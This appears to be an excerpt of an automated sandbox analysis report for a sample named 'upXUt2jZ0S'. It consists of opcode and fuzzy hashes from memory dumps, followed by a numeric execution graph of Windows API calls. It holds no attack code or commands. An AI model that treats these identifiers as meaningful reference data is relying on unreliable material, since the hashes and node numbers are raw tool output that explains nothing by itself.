                                                                        • API String ID:
                                                                        • Opcode ID: a540b13a95fc6f442550e1d7357ddde706e7282f688ea77e66387dcbfb6d2df4
                                                                        • Instruction ID: 382050b2426ed408a5aef071525b3a6a415ada7014bf01b74304b4300f58dec4
                                                                        • Opcode Fuzzy Hash: a540b13a95fc6f442550e1d7357ddde706e7282f688ea77e66387dcbfb6d2df4
                                                                        • Instruction Fuzzy Hash: BD71F6747046058FDB29DF68C898AAA7BE5FF99700F1540A9E902CB3B1DB70DC41DB91
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1545197773.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_830000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6ce7a8c97b9c0224e3ced1e8386ffef18478da53dd9cc5c133508b2d126e62a9
                                                                        • Instruction ID: d1928f7e2b888738ac8ce230c779d1810aea49fcdda4040e137997cbc0b631a1
                                                                        • Opcode Fuzzy Hash: 6ce7a8c97b9c0224e3ced1e8386ffef18478da53dd9cc5c133508b2d126e62a9
                                                                        • Instruction Fuzzy Hash: 4751BC34076A528FD302ABA4ADAC57E7FB4FB0F327305AD86A05F85435CB39504A9B58
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1545197773.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_830000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3549a492e1ad0684eb2ac947cd76a96079b4968be80c0337c367fbb52f4a91d4
                                                                        • Instruction ID: 0ae8d8eb21eb9a2d1f6c37751e878c68ee87b0c1a806d36799bf9f71ae29b299
                                                                        • Opcode Fuzzy Hash: 3549a492e1ad0684eb2ac947cd76a96079b4968be80c0337c367fbb52f4a91d4
                                                                        • Instruction Fuzzy Hash: 3051AB34072A528F9302BFA4ADAC57E7BB5FB0F327705AD86A01F84434CB3550469B98
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1545197773.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_830000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: aac80607d2c8f68d5ec65f4f2418c5c2d09b31681706f64748052e22af1918e9
                                                                        • Instruction ID: 4c7a5a695bba00bdd6297d2b3a6c5f5c965271d7bacac1606f7af90b7aef7cb2
                                                                        • Opcode Fuzzy Hash: aac80607d2c8f68d5ec65f4f2418c5c2d09b31681706f64748052e22af1918e9
                                                                        • Instruction Fuzzy Hash: 1E519374E01218DFDB58DFA9D99499DBBF2FF89700F248169E809AB365DB309901CF50
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1545197773.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_830000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 037d1312f2177ba5c5a315e8d6d48ff8976624b822394a2206be719e2d7645c0
                                                                        • Instruction ID: 70239170c66318bca7288ad622024d38878ba6dd14f8ac34416e1e201ac6f340
                                                                        • Opcode Fuzzy Hash: 037d1312f2177ba5c5a315e8d6d48ff8976624b822394a2206be719e2d7645c0
                                                                        • Instruction Fuzzy Hash: 72519175E01308CFCB08DFA9D89499DBBB2FF89301F208469E805AB364DB31A946DF50
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1545197773.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_830000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2476e3393c476a720cb1b7616b3d4e3d76a00085f535d32149e5e5e1d1144f66
                                                                        • Instruction ID: a64128e69560e225b636de24caf7a7c613a747f4e8a62be23cb336d455aa40eb
                                                                        • Opcode Fuzzy Hash: 2476e3393c476a720cb1b7616b3d4e3d76a00085f535d32149e5e5e1d1144f66
                                                                        • Instruction Fuzzy Hash: 9E41A031A04259DFCF11CFA4D844A9EBFB2FF89310F148656E896DB2A1D3B0D951DBA0
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1545197773.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_830000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 107ddf94c1d869eae4c82177e5ca7ed9a7809daf5e05991e409ee2669e4f5b96
                                                                        • Instruction ID: d28a9141643158f17a24a40b8f821371119c84165f3202175d00cecd50137392
                                                                        • Opcode Fuzzy Hash: 107ddf94c1d869eae4c82177e5ca7ed9a7809daf5e05991e409ee2669e4f5b96
                                                                        • Instruction Fuzzy Hash: E441C3357042089FCB159BB5D8546AE7BF6FBC8310F14456AE906E7391CE359C02C791
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1545197773.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_830000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fadb6bda0c7053f7ff46f31117e1828ca92b9114f5e2397058074625a349ce17
                                                                        • Instruction ID: 9859d9b94d4b641ded563adae94989fcf0efd85d1036ffc9686a1158840e306e
                                                                        • Opcode Fuzzy Hash: fadb6bda0c7053f7ff46f31117e1828ca92b9114f5e2397058074625a349ce17
                                                                        • Instruction Fuzzy Hash: 1A313431B003298BEF189BB6889437E62AAFBD4310F18443AD806D7390DF79CE0597D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1545197773.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_830000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: eddae7d63c6bb8f739f9b9172dca759ebe2f130851cc037993cbcb19dc4b987c
                                                                        • Instruction ID: 1c46289342e40acfb909f68232ea64048bac2b5ab4384efacb82b1c99a2e37ac
                                                                        • Opcode Fuzzy Hash: eddae7d63c6bb8f739f9b9172dca759ebe2f130851cc037993cbcb19dc4b987c
                                                                        • Instruction Fuzzy Hash: C6319271204149DFCB05AFA4D854AAF3BA2FB88311F104425F91AC7361DB39DD62DBE1
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1545197773.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_830000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3162a15b169bad9b1b1d4989752eb5ab2be23980a2590d5ec29c200092181711
                                                                        • Instruction ID: fd90a0fe78b4753c26ceb98929d83af4285c07cc0e731e4f1ff565be2be8fbe1
                                                                        • Opcode Fuzzy Hash: 3162a15b169bad9b1b1d4989752eb5ab2be23980a2590d5ec29c200092181711
                                                                        • Instruction Fuzzy Hash: 0221B0743082048BEB3517699CA4AB93797FFD8719F1841BAD942CB795EE25CC42A7C0
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1545197773.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_830000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fcecf3697a6783d19409ef6954adf62416a2aa37564a000e299cf596c1e281ac
                                                                        • Instruction ID: 9de74df24d577579135cff0334b7fa308413dd11c180ddd695792e1dc2038a6f
                                                                        • Opcode Fuzzy Hash: fcecf3697a6783d19409ef6954adf62416a2aa37564a000e299cf596c1e281ac
                                                                        • Instruction Fuzzy Hash: B721C2783082058BEB3457398864ABE3297FFC8719F284079D502CB798EE69CC42E7C1
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1545197773.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_830000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dfccd67f2921427159762dc431b2b299608dd8bfce2943036e10823f32f60ef6
                                                                        • Instruction ID: 944cda30c0ecff42cef73f9716fd1b36c86a010d5e9600ad1485d0ebb8b63db2
                                                                        • Opcode Fuzzy Hash: dfccd67f2921427159762dc431b2b299608dd8bfce2943036e10823f32f60ef6
                                                                        • Instruction Fuzzy Hash: F721A130305A218FC7199B64C8A452EB7A2FFC9761B1942AAE807CB361DF34DC0397D0
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1545197773.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_830000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 31bf25b6ededf93929045efdc1336394a86b617ac2157c39c9e41f7a90d8f1aa
                                                                        • Instruction ID: a38a60cba45a65bfcfd50ce3915be2ea47228c4b39dfe3005b4fa52a7cc633dc
                                                                        • Opcode Fuzzy Hash: 31bf25b6ededf93929045efdc1336394a86b617ac2157c39c9e41f7a90d8f1aa
                                                                        • Instruction Fuzzy Hash: 9521A131A00615DFDB14DB64C4909AE77A9FBD8350F20C419E909DB260DB31EE4ACBD1
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1545197773.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_830000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 345342752cd38ff0ba0ebb55e19b22f9073ff51dbe03c9323f06bd8a579e6bce
                                                                        • Instruction ID: ab66c418ef296b77b82f54910b2eca2ac2c30eb5be078998bc33d21228d33196
                                                                        • Opcode Fuzzy Hash: 345342752cd38ff0ba0ebb55e19b22f9073ff51dbe03c9323f06bd8a579e6bce
                                                                        • Instruction Fuzzy Hash: FB214830C102598ECB11EFF8D8186ECBBB0FF9A304F109669D444B7261EB306A5ADB94
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1543758444.000000000078D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0078D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_78d000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c6eed25e3c0df23596704b74a48da0493305876882232cf6604f2994ebdfe10a
                                                                        • Instruction ID: 16ba9cfab6da614724b91fdbf9e51856bc9d6f51f42183eb6d0e498b57d34bdc
                                                                        • Opcode Fuzzy Hash: c6eed25e3c0df23596704b74a48da0493305876882232cf6604f2994ebdfe10a
                                                                        • Instruction Fuzzy Hash: 4F21F471540284DFDB24EF50D8C0F16BB65FB94324F24C169DD094A296C33AEC56C7A1
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1545197773.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_830000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: af09c965d3831946239d6e2a6a32c59a81800433be34912f3bf6a2c03010bc98
                                                                        • Instruction ID: 6d7178956f05d9948df2cead2697fdca6868380bc291e710d50f33929d8515d3
                                                                        • Opcode Fuzzy Hash: af09c965d3831946239d6e2a6a32c59a81800433be34912f3bf6a2c03010bc98
                                                                        • Instruction Fuzzy Hash: 2621F8349412098FCF05DFB5D854AEEB7B2FB8A305F109569C805B73A4DB35A906CB54
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1545197773.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_830000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 38f497c874a61ad78ba033e364ac754a118f456ec6f127db6d3efe1395a43555
                                                                        • Instruction ID: dd385ff532e921b78c27ecaeebc6ef198b066e894b100f8267ab82b495f6066c
                                                                        • Opcode Fuzzy Hash: 38f497c874a61ad78ba033e364ac754a118f456ec6f127db6d3efe1395a43555
                                                                        • Instruction Fuzzy Hash: 8621D771608249CFC7159FA8D854A6E3BA2FF88720F14406AF406CB352DB38ED16DBD1
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1545197773.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_830000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 581eba752e346472a8b2cfdc236a26255a3e145486c800b1e493ab836730357d
                                                                        • Instruction ID: 198d54bbb67d417721fdfc0a920b6f19e992ae0905c1a67998db5bff08090709
                                                                        • Opcode Fuzzy Hash: 581eba752e346472a8b2cfdc236a26255a3e145486c800b1e493ab836730357d
                                                                        • Instruction Fuzzy Hash: 2B316278E01308DFCB44EFA8E59489DBBB2FF49305B21446AE809AB364D731AD05DF50
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1545197773.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_830000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7d88a3aa4747b3ada7e5a044b6910f70cc69cc1377d0e4d279a570830e6c1aa3
                                                                        • Instruction ID: ce8dfc32511db7ca3565632a97ff493e78b430a88bfb2b73dacc8925743a928f
                                                                        • Opcode Fuzzy Hash: 7d88a3aa4747b3ada7e5a044b6910f70cc69cc1377d0e4d279a570830e6c1aa3
                                                                        • Instruction Fuzzy Hash: 1321C434A01208CBCF05DFB9E854AEEB7B2BB8A305F109469D405B7364DB39A946CF64
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1545197773.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_830000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9a932b4cf2d6f99019a615e163d8fcc43e22d907f8c1264b6fe5f6c33b4ae464
                                                                        • Instruction ID: 1fe5079a007a15aef02b969ba85b7cb03513962a2726dd36d4d8ea5e5c25418a
                                                                        • Opcode Fuzzy Hash: 9a932b4cf2d6f99019a615e163d8fcc43e22d907f8c1264b6fe5f6c33b4ae464
                                                                        • Instruction Fuzzy Hash: 52118231301A218BC7199B69C8A492EB7A6FFC8761B194169E807CB360DF30DC0297D0
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1543758444.000000000078D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0078D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_78d000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                                                        • Instruction ID: b47f76186dbaa60f0f3a33c386138d32428754410721065a18cb095c3c754fa3
                                                                        • Opcode Fuzzy Hash: f4ddf6aab7a4ec5fdcafc4d9db3305c30ac7726daeb53e4266b93089bec5e780
                                                                        • Instruction Fuzzy Hash: 53110372444280CFCB11DF00D5C4B16BF71FB94324F24C1A9DC090B696C33AE856CBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1545197773.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_830000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 069fdeda2b8850fc236eb9d065aa166873075a9ab1f8fce96479d6760c22d966
                                                                        • Instruction ID: 57bbbed00662b07794bf65c09ea8bc60d56890e8a6da0d3a295d0a25734053dc
                                                                        • Opcode Fuzzy Hash: 069fdeda2b8850fc236eb9d065aa166873075a9ab1f8fce96479d6760c22d966
                                                                        • Instruction Fuzzy Hash: 9821D0B4D056098FCB11EFA8D8585EEBFF0FF49304F1041AAD846B7264EB345A46CBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1545197773.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_830000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a03f06b88d4566769d7d870ef5b87d4f5e552373f860685196473fb14018dd07
                                                                        • Instruction ID: 8b8fcedf42ebb0d998a3baa0ee45d9dbd3a356bd530a04e608295da43f0e9b6b
                                                                        • Opcode Fuzzy Hash: a03f06b88d4566769d7d870ef5b87d4f5e552373f860685196473fb14018dd07
                                                                        • Instruction Fuzzy Hash: 3721C2B4D056098FCB44EFA8D8556EDBBF1FF49304F10416AD805B3220EB346A45CBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1545197773.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_830000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a08b976281268b412f7e993cb86f027a4cf055d9bfba48ba963b13143cd46f02
                                                                        • Instruction ID: adc2008896009c45a88ecdf5d8809c94388a787f72e6c362fae662bbd6215dcd
                                                                        • Opcode Fuzzy Hash: a08b976281268b412f7e993cb86f027a4cf055d9bfba48ba963b13143cd46f02
                                                                        • Instruction Fuzzy Hash: B501F5727041046FCB069E689811AEE3BA7EBD9760F18806BF406C7280DA398D07DBA1
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1545197773.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_830000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0f88cfe7d6d5385fb646d7b6e22fb11fe68c457dff6332e107128393aa31a3ef
                                                                        • Instruction ID: 303c6bb7f046450678a3541094add7f3624fc6eb6319ccc833218de56419633f
                                                                        • Opcode Fuzzy Hash: 0f88cfe7d6d5385fb646d7b6e22fb11fe68c457dff6332e107128393aa31a3ef
                                                                        • Instruction Fuzzy Hash: 3AE0DF36D2426A9BCB2096A5B8189FEBF35AFE2315F11426AD06137181EB70150A8761
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1545197773.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_830000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 72ca6b1f4bbfef835cae689a35a7d9f0f98555ee047b86f354304d8d87fda73b
                                                                        • Instruction ID: a7925a47f84833d748cca345b0d4b124d72dd65a835aba162b19291c4699523a
                                                                        • Opcode Fuzzy Hash: 72ca6b1f4bbfef835cae689a35a7d9f0f98555ee047b86f354304d8d87fda73b
                                                                        • Instruction Fuzzy Hash: D8D01732D2022A979B10AAA9DC048EEBB38EE96621B908626D52437140EB70265986B1
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1545197773.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_830000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                        • Instruction ID: 2bdb7748b48a04e9d5fe3a99138b23bc39711ef955dddacdccdc9bf841c07448
                                                                        • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                        • Instruction Fuzzy Hash: 00C0123324C228AAA624208E7C40AA3AB8CE2C17B8E250137F91CE3300A8429C8001E8
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1545197773.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_830000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 597da9fd309c2592eda62836f0e90d6cb82ec0902d6e8c3c7fee6b5cd88c1919
                                                                        • Instruction ID: 8e74430b375de0659912a281cdf1d17ab969f144e8f62a1e8aecd0517a06316c
                                                                        • Opcode Fuzzy Hash: 597da9fd309c2592eda62836f0e90d6cb82ec0902d6e8c3c7fee6b5cd88c1919
                                                                        • Instruction Fuzzy Hash: 89D0677AB01008EFDB04DF98EC409DDB7B6FB9C221B048156E915A3260C6319961DB54
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1545197773.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_830000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 00f2b730b46531f3e56225cf017896437ad174abb2aefa1d8cab11105c3363fe
                                                                        • Instruction ID: da6902bda6daee1fb2961c6a0f3c417049de8b038069cbe192665812a1444ec8
                                                                        • Opcode Fuzzy Hash: 00f2b730b46531f3e56225cf017896437ad174abb2aefa1d8cab11105c3363fe
                                                                        • Instruction Fuzzy Hash: B4D02B7440C3850BD703F770E9698483F216A85108B4442D9E8060942BEA74591B9B13
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1545197773.0000000000830000.00000040.00000800.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_830000_upXUt2jZ0S.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7b3447b70db245deefee1abfb1622833eb0c8b6c42c065e8299a0ae6bc25b027
                                                                        • Instruction ID: 3245b1270ab839f94542f4a84f836a57d8198698307615e99a542319e2deeae4
                                                                        • Opcode Fuzzy Hash: 7b3447b70db245deefee1abfb1622833eb0c8b6c42c065e8299a0ae6bc25b027
                                                                        • Instruction Fuzzy Hash: 91C0127051030947D501F7B1E959915331A66C4600F404510B0090912AEF787E5B5792

                                                                        Execution Graph

                                                                        Execution Coverage:10.5%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:158
                                                                        Total number of Limit Nodes:21
                                                                        execution_graph 26489 14b4668 26490 14b467a 26489->26490 26491 14b4686 26490->26491 26495 14b4779 26490->26495 26500 14b3e10 26491->26500 26493 14b46a5 26496 14b479d 26495->26496 26504 14b4878 26496->26504 26508 14b4888 26496->26508 26501 14b3e1b 26500->26501 26516 14b5c64 26501->26516 26503 14b6fe1 26503->26493 26505 14b48af 26504->26505 26507 14b498c 26505->26507 26512 14b4248 26505->26512 26510 14b48af 26508->26510 26509 14b498c 26509->26509 26510->26509 26511 14b4248 CreateActCtxA 26510->26511 26511->26509 26513 14b5918 CreateActCtxA 26512->26513 26515 14b59db 26513->26515 26517 14b5c6f 26516->26517 26520 14b5c84 26517->26520 26519 14b70e5 26519->26503 26521 14b5c8f 26520->26521 26524 14b5cb4 26521->26524 26523 14b71c2 26523->26519 26525 14b5cbf 26524->26525 26528 14b5ce4 26525->26528 26527 14b72c5 26527->26523 26530 14b5cef 26528->26530 26529 14b8609 26529->26527 26530->26529 26533 14bcd60 26530->26533 26537 14bcd70 26530->26537 26534 14bcd91 26533->26534 26535 14bcdb5 26534->26535 26541 14bcf20 26534->26541 26535->26529 26538 14bcd91 26537->26538 26539 14bcdb5 26538->26539 26540 14bcf20 2 API calls 26538->26540 26539->26529 26540->26539 26542 14bcf2d 26541->26542 26543 14bcf67 26542->26543 26545 14bb780 26542->26545 26543->26535 26546 14bb78b 26545->26546 26548 14bdc78 26546->26548 26549 14bd084 26546->26549 26548->26548 26550 14bd08f 26549->26550 26551 14b5ce4 2 API calls 26550->26551 26552 14bdce7 26551->26552 26553 14bdcf6 26552->26553 26556 14bdd60 26552->26556 26560 14bdd50 26552->26560 26553->26548 26557 14bdd8e 26556->26557 26558 14bde5a KiUserCallbackDispatcher 26557->26558 26559 14bde5f 26557->26559 26558->26559 26561 14bdd8e 26560->26561 26562 14bde5a KiUserCallbackDispatcher 26561->26562 26563 14bde5f 26561->26563 26562->26563 26592 14bd438 26593 14bd47e 26592->26593 26597 14bd608 26593->26597 26600 14bd618 26593->26600 26594 14bd56b 26603 14bb790 26597->26603 26601 14bd646 26600->26601 26602 14bb790 DuplicateHandle 26600->26602 26601->26594 26602->26601 26604 14bd680 DuplicateHandle 26603->26604 26605 14bd646 26604->26605 26605->26594 26564 7261f80 26565 7261f90 26564->26565 26569 7261fb1 SendMessageW 26565->26569 26571 7261fb8 SendMessageW 26565->26571 26566 7261fa1 26570 7262024 26569->26570 26570->26566 26572 7262024 26571->26572 26572->26566 26573 7260040 26574 7260065 26573->26574 26575 726010e 26574->26575 26576 72602a3 26574->26576 26579 7260480 26574->26579 26575->26576 26584 726e520 26575->26584 26580 7260494 26579->26580 26580->26575 26581 72604f2 26580->26581 26582 14bdd50 KiUserCallbackDispatcher 26580->26582 26583 14bdd60 KiUserCallbackDispatcher 26580->26583 26581->26575 26582->26581 26583->26581 26587 726e585 26584->26587 26585 726c890 PeekMessageW 26585->26587 26587->26585 26588 726e5d2 26587->26588 26589 726c8dc 26587->26589 26588->26576 26590 726f288 DispatchMessageW 26589->26590 26591 726f2f4 26590->26591 26591->26587 26606 7260b50 26607 7260b69 26606->26607 26608 7260b73 26606->26608 26607->26608 26611 7266810 26607->26611 26617 7266801 26607->26617 26612 726682a 26611->26612 26615 726683d 26611->26615 26623 72655b8 26612->26623 26614 7266883 26614->26608 26615->26614 26616 72655b8 OleInitialize 26615->26616 26616->26614 26618 726682a 26617->26618 26621 726683d 26617->26621 26619 72655b8 OleInitialize 26618->26619 26619->26621 26620 7266883 26620->26608 26621->26620 26622 72655b8 OleInitialize 26621->26622 26622->26620 26624 72655c3 26623->26624 26625 72668ae 26624->26625 26628 72668e8 26624->26628 26634 72668d8 26624->26634 26625->26615 26629 7266bf0 26628->26629 26630 7266910 26628->26630 26629->26625 26631 7266919 26630->26631 26640 7265654 26630->26640 26631->26625 26633 726693c 26635 7266bf0 26634->26635 26636 7266910 26634->26636 26635->26625 26637 7266919 26636->26637 26638 7265654 OleInitialize 26636->26638 26637->26625 26639 726693c 26638->26639 26641 726565f 26640->26641 26642 7266c33 26641->26642 26644 7265670 26641->26644 26642->26633 26645 7266c68 OleInitialize 26644->26645 26646 7266ccc 26645->26646 26646->26642 26647 14bacb0 26648 14bacbf 26647->26648 26651 14bad99 26647->26651 26656 14bada8 